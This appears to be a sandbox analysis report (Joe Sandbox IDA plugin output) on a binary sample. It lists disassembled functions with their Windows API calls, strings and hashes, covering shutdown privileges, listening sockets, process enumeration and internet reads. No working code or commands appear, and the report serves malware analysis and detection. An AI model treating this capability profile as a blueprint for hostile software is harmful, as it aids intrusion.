Opcode Fuzzy Hash: 8e425bf387d2f230011e7b1f4b9acba4e35083527a57f9a5fbfb73f418a1d7ef
Instruction Fuzzy Hash: 51218931320611AFDB11AF64EC4DB6D77A8EF49B10F04841AF94A9B2A1CF70E8608B94

Function 0027C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00259ABF: CLSIDFromProgID.OLE32 ref: 00259ADC
Part of subcall function 00259ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00259AF7
Part of subcall function 00259ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00259B05
Part of subcall function 00259ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00259B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0027C235
_memset.LIBCMT ref: 0027C242
_memset.LIBCMT ref: 0027C360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0027C38C
CoTaskMemFree.OLE32(?), ref: 0027C397

Strings

NULL Pointer assignment, xrefs: 0027C3E5

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 27678ea858ff0871605d89fd0f0a1cd22f0086f2a3423b3f834748179d81a8e5
Instruction ID: 0e9dba79468d10d749073587df16346f76d5e621801ab8a3e8a2db86daab0723
Opcode Fuzzy Hash: 27678ea858ff0871605d89fd0f0a1cd22f0086f2a3423b3f834748179d81a8e5
Instruction Fuzzy Hash: 71914A71D10228ABDB10DFA4DC95EDEBBB9EF04710F20815AF519A7281DB709A55CFA0

Function 002679D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 0025B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0025B180
Part of subcall function 0025B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0025B1AD
Part of subcall function 0025B134: GetLastError.KERNEL32 ref: 0025B1BA

ExitWindowsEx.USER32(?,00000000), ref: 00267A0F

Strings

SeShutdownPrivilege, xrefs: 002679DD
, xrefs: 002679FD
@, xrefs: 00267A02

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 2a409c178f856bcb80363b61b7643f79bc25c477b666df5d234f7ad15cdd2cf0
Instruction ID: 634b6c99ff28775ecd0646d9b00a028a358dfa1ca1450733832f59e8325d05a2
Opcode Fuzzy Hash: 2a409c178f856bcb80363b61b7643f79bc25c477b666df5d234f7ad15cdd2cf0
Instruction Fuzzy Hash: 2B01F7716782226BF7285AB4FC4ABBF32589B01358F240524BD13E20C2D9A05EA085A4

Function 00278C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00278CA8
WSAGetLastError.WSOCK32(00000000), ref: 00278CB7
bind.WSOCK32(00000000,?,00000010), ref: 00278CD3
listen.WSOCK32(00000000,00000005), ref: 00278CE2
WSAGetLastError.WSOCK32(00000000), ref: 00278CFC
closesocket.WSOCK32(00000000,00000000), ref: 00278D10

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 8f498e557d4fa9398a0a9d11e8d44d3c4efddd903378ea4b9ac0093da6b8c7c9
Instruction ID: 51d21a2e456b5d9dd68455bbf4d90ce02db36979e29ba6eca5f12dfafee88156
Opcode Fuzzy Hash: 8f498e557d4fa9398a0a9d11e8d44d3c4efddd903378ea4b9ac0093da6b8c7c9
Instruction Fuzzy Hash: 7D21FD31610201AFCB14EF68DC88B6EB3A8EF49720F108149F95BA72D2CB70AD518B61

Function 00266532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00266554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00266564
Process32NextW.KERNEL32(00000000,0000022C), ref: 00266583
__wsplitpath.LIBCMT ref: 002665A7
_wcscat.LIBCMT ref: 002665BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 002665F9

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 829a8af2aaca7f5a9005f38c2c7e8675681397b513e0e88a232cc97ac699a65f
Instruction ID: 559a6fb01dde4f46bc0d9d8f24349b2bf0f46c049ce76c1694b4988c52f54a9e
Opcode Fuzzy Hash: 829a8af2aaca7f5a9005f38c2c7e8675681397b513e0e88a232cc97ac699a65f
Instruction Fuzzy Hash: 8A214171910219ABDB10AFA4DC89BE9B7BCAB45300F5004A5E506D7141DBB19FD5CF61

Function 00229B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00229E95
ERCP, xrefs: 00229C32
VUUU, xrefs: 00229EA7
,, xrefs: 00229CF3
VUUU, xrefs: 00229ED4
VUUU, xrefs: 002ABE14

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU$,
API String ID: 0-2903148410
Opcode ID: e68f52b7a4e8181760c15f445eb2b150df161ea9fbcafa510a245eae405d83b6
Instruction ID: 2f677592558c67671ef4acdf3cf586e038db727e6bc976bc6ba1c701ef6daf7d
Opcode Fuzzy Hash: e68f52b7a4e8181760c15f445eb2b150df161ea9fbcafa510a245eae405d83b6
Instruction Fuzzy Hash: E192D470E2022ADBDF24CF98D8407BDB7B1BB55314F24819AE819A7681DB709DE1CF51

Function 002613CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 002613DC

Strings

<2-, xrefs: 002616FA
,2-, xrefs: 002616B1
(, xrefs: 00261422
|, xrefs: 0026140C

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: lstrlen
String ID: ($,2-$<2-$|
API String ID: 1659193697-640232112
Opcode ID: 12786b056dc46b4442ebb0ad3309a4637e9a8909ad4bd75432623b5997c31e98
Instruction ID: 6207e376a1bef8eff4c61adc82136bf8001b12e13cf9ca21f3fa750286586469
Opcode Fuzzy Hash: 12786b056dc46b4442ebb0ad3309a4637e9a8909ad4bd75432623b5997c31e98
Instruction Fuzzy Hash: 28321575A106059FC728CF69C480A6AF7F0FF48310B15C56EE59ADB3A1E770E9A1CB44

Function 0027923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0027A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0027A84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00279296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 002792B9

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 7df3ae35a5e626725933b5dc9c062037ab321f052947c1961213bb0cd75207c3
Instruction ID: 5f7c80ec0feea42a49f7f04c50071a34a5ac97518593dcd257249d8887bb1e2b
Opcode Fuzzy Hash: 7df3ae35a5e626725933b5dc9c062037ab321f052947c1961213bb0cd75207c3
Instruction Fuzzy Hash: EF41EF70610210AFDB14BF68CC86E7EB7EDEF44724F148449F956AB2C2CA749D618F91

Function 0026EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0026EB8A
_wcscmp.LIBCMT ref: 0026EBBA
_wcscmp.LIBCMT ref: 0026EBCF
FindNextFileW.KERNEL32(00000000,?), ref: 0026EBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0026EC0E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 5be373ae3b0fb3565ebcf86d121ffde900ebbd20354f7c4fa6d1ca4c5bfd0eaf
Instruction ID: 4994c5f0421cf3edd5b77d073e111b60e6a45ccefef065236c5b82504c5dd089
Opcode Fuzzy Hash: 5be373ae3b0fb3565ebcf86d121ffde900ebbd20354f7c4fa6d1ca4c5bfd0eaf
Instruction Fuzzy Hash: 3941CE79610302CFCB08DF28C491A9AB3E4FF49324F10455EE95A8B3A1DB31A9A4CF91

Function 00288111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00288160
IsWindowEnabled.USER32 ref: 0028816E
GetForegroundWindow.USER32(?,?,00000001), ref: 0028817B
IsIconic.USER32 ref: 00288189
IsZoomed.USER32 ref: 00288197

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: c69491dae2587a57a29e013a04043c21255bc3339e8940e572f415b41f7b0ae5
Instruction ID: 03653b720df12cda60aac21c8fe9f5932df5d3d7ea3981e901792acedefc30df
Opcode Fuzzy Hash: c69491dae2587a57a29e013a04043c21255bc3339e8940e572f415b41f7b0ae5
Instruction Fuzzy Hash: 8611B635711211AFE7217F25EC48A6F779CEF45760B450419F44AD7181CF7099228BA0

Function 00266606 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00266623
DeviceIoControl.KERNEL32(00000000,EMSETTEXT,?,0000000C,?,00000028,?,00000000), ref: 00266664
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0026666F

Strings

EMSETTEXT, xrefs: 00266652

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID: EMSETTEXT
API String ID: 33631002-1828000075
Opcode ID: d2aebb82b7002f2381538acb17f95677ed89c23278e2fcdfa36cc6fbb3ba6481
Instruction ID: ccfa0423c53ca450e46c122b67d9129895f6791003a4e718971f900adf7af2fe
Opcode Fuzzy Hash: d2aebb82b7002f2381538acb17f95677ed89c23278e2fcdfa36cc6fbb3ba6481
Instruction Fuzzy Hash: C0115E71E11228BFDB108FA4EC44BAEBBBCEB45B10F104156F910F6290D7B05E019BA1

Function 0023E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0023E014,76230AE0,0023DEF1,002BDC38,?,?), ref: 0023E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0023E03E

Strings

GetNativeSystemInfo, xrefs: 0023E038
kernel32.dll, xrefs: 0023E027

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 9e375a430ef33ccf205049d888d35035e5de51a0d467aa44393f6c507cc077d9
Instruction ID: 2c106f4c3c9e0c4f391cdd0c8ee0784965c06f6bae1c8a6843955d89620351a0
Opcode Fuzzy Hash: 9e375a430ef33ccf205049d888d35035e5de51a0d467aa44393f6c507cc077d9
Instruction Fuzzy Hash: 5BD0A770520713DFCB354F60FC0C61277D4AF12300F19841AE886E2690DBB4DC988E50

Function 0023B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 0023B34E: GetWindowLongW.USER32(?,000000EB), ref: 0023B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 0023B22F

Part of subcall function 0023B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0023B5A5

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: 49850ec9f16faa55230f30a73f0b86842e45b493f250bd065e565a95845d5726
Instruction ID: e9039e70e1273656cdd80c2c9653ece8c98061e3ae3124b893165befd24d8800
Opcode Fuzzy Hash: 49850ec9f16faa55230f30a73f0b86842e45b493f250bd065e565a95845d5726
Instruction Fuzzy Hash: 4BA179F0634006BADF2AAF2A9C88E7F295CEB46340F514329FE46D6591DB64DC30D672

Function 00274EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,002743BF,00000000), ref: 00274FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00274FD2

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 61cbf3920daa140e460995e93a133f1f3a38654a3c4efe55055ecfaafa5947e4
Instruction ID: 81c826abfc18f11ca093484c58074ca2124cf00d5c09968968c5c8c520b8bc2c
Opcode Fuzzy Hash: 61cbf3920daa140e460995e93a133f1f3a38654a3c4efe55055ecfaafa5947e4
Instruction Fuzzy Hash: 3E410A7152421ABFEB21DF94DC85EBFB7BCEB40314F10802AF609A6540DBB19E519A51

Function 002277B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00227921

Strings

\Q-, xrefs: 002A1028

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _memmove
String ID: \Q-
API String ID: 4104443479-2090352294
Opcode ID: 6af52c773bf74167d352891f45fc83dadcb6fa578d5f77d6a43d90902877cd78
Instruction ID: c43fe2556786678d19cd998127656da7c5a996c1ebadb881059283b769a549f1
Opcode Fuzzy Hash: 6af52c773bf74167d352891f45fc83dadcb6fa578d5f77d6a43d90902877cd78
Instruction Fuzzy Hash: AEA27E70D2822ADFCB24CF98D4806ADB7B1FF49314F2581A9D859AB390D7709E91DF40

Function 0026E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0026E20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0026E267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0026E2B4

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 93477750d9b8a0ecb650726da1cf89ff14c6c452652710bc8a64c343b29e6111
Instruction ID: db278326a9c8e5d16ecd98ba38404be8e8d462d0f046c1407e7afe0dcaaaaf97
Opcode Fuzzy Hash: 93477750d9b8a0ecb650726da1cf89ff14c6c452652710bc8a64c343b29e6111
Instruction Fuzzy Hash: E6219D35A10218EFCB00EFA5D884AEDFBB8FF49310F0484AAE805AB251CB319955CF50

Function 0025B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0023F4EA: std::exception::exception.LIBCMT ref: 0023F51E
Part of subcall function 0023F4EA: __CxxThrowException@8.LIBCMT ref: 0023F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0025B180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0025B1AD
GetLastError.KERNEL32 ref: 0025B1BA

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 01495c2c5f3d27954800f56370f885bc3f74899f9ff1c9ba3b56adc5bf1a4090
Instruction ID: d586e4113869abed8607b25277426f99f1a3bd5917a7f86e832d0973acd2eba1
Opcode Fuzzy Hash: 01495c2c5f3d27954800f56370f885bc3f74899f9ff1c9ba3b56adc5bf1a4090
Instruction Fuzzy Hash: 7F110EB2820201AFE718AF64ECC5D2BB7BCFB04710B20842EF44A97200EB70FC558B60

Function 002671FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00267223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0026723A
FreeSid.ADVAPI32(?), ref: 0026724A

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 4c308bd46465b6b096c8fe411e24e90e56e3a888d0449bc4aedef1f8e9737f27
Instruction ID: ae4fdc923fac7db5485d2cc1c192e6f29a55a62081fc7c98cbe0a952b6327fda
Opcode Fuzzy Hash: 4c308bd46465b6b096c8fe411e24e90e56e3a888d0449bc4aedef1f8e9737f27
Instruction Fuzzy Hash: 11F01D7AA14219BFDF04DFF4DD99AEEBBB8FF09305F104469A602E2591E7709A448B10

Function 0026F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0026F599
FindClose.KERNEL32(00000000), ref: 0026F5C9

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
